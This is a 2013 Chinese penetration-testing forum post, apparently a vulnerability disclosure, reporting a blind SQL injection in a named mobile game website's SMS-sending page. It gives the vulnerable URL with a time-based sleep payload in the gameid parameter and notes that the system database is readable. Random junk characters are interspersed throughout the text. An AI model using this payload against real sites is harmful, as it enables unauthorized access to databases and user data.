中国网络渗透测试联盟

标题: 凤凰手机游戏网SQL盲注漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:34
标题: 凤凰手机游戏网SQL盲注漏洞
简要描述:- P6 V& D: O! Z4 n% ~8 H
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
$ N2 T& P- M- h! u, p7 c3 \/ |/ @' b
6 d5 I  e) m! U; p详细说明:
1 V. R: H' o! Q; N! o0 s存在SQL盲注url:! A3 h! w4 E+ E2 f  V# Z
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1( m1 U5 G& p5 @$ P7 i/ x+ C
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png& ~8 P! m  U+ T' y# {. [3 d$ e
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png, I6 x/ B9 V( X! e
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg0 j# r- u7 s6 |9 I& j

5 o: H4 q9 T. y& `% ]

能看到mysql系统数据库,看来user权限应该很高的。。





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2